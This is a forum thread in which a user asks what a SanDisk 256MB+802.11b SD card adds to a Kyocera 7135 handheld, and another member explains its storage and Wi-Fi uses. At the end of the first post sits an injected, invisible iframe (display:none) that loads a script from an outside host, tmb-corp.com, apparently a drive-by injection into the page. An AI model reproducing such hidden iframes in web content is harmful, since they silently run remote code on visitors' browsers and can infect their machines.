+ Reply to Thread

new sandisk card

I am not very tech oriented. I want to buy an additional SD card for an emeregency. What exactly will the new Sandisc card that is 256 plus 1102.11 (?) offer? What can it do? Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: new sandisk card

Originally posted by rcyphermd
    I am not very tech oriented. I want to buy an additional SD card for an emeregency. What exactly will the new Sandisc card that is 256 plus 1102.11 (?) offer? What can it do? Thanks!
    The SanDisk 256MB+802.11b will offer you two important enhancements to your 7135. These are:

1) 256MB of storage. This can be used for PalmOS applications, Backup of your device (should you need to Hard Reset), store lots of MP3's, play TealMovies (one of my favorites) and more.

2) 802.11b communications. 802.11b is simply a wireless communication standard that is very common today. If you have a high-speed internet connection (Cable or DSL) at home, for instance, you can install an 802.11b Access Point (or AP) that allows any wireless device in your home to connect to the internet using the high-speed internet connection. LinkSys (http://www.linksys.com) makes a device that is a Router, Hub and 802.11b AP all in one. A good idea for someone who wants to simplify the installation. I use a WAP-11 which is external to my LinkSys router, but either should work just fine with the SanDisk 802.11b SD card (I hope anyway).

With the 802.11b card installed in your Kyocera 7135, you can browse the internet while sitting in the living room, bedroom, etc. without using your cellphone's airtime. Many coffee shops, libraries, Hotels, etc. also offer free 802.11b access so in those places you may have (free) internet connectivity.

I hope this helps.

Thanks for the great explanation! I have already an Linksys router and wireless gadget some my kids computer can run upstairs from our cable modem.

I didn't realize that I can do the same on the 7135 with the new card. Sounds great! When is it available and price?